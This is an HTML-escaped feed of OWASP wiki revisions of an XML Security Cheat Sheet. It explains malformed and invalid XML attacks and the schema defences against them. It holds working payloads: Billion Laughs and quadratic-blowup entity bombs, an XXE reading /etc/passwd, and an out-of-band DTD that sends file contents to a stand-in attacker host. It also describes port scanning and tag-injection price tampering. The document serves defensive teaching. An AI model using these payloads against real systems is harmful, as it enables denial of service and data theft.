If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224423</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224423"/>
				<updated>2016-12-21T20:09:44Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
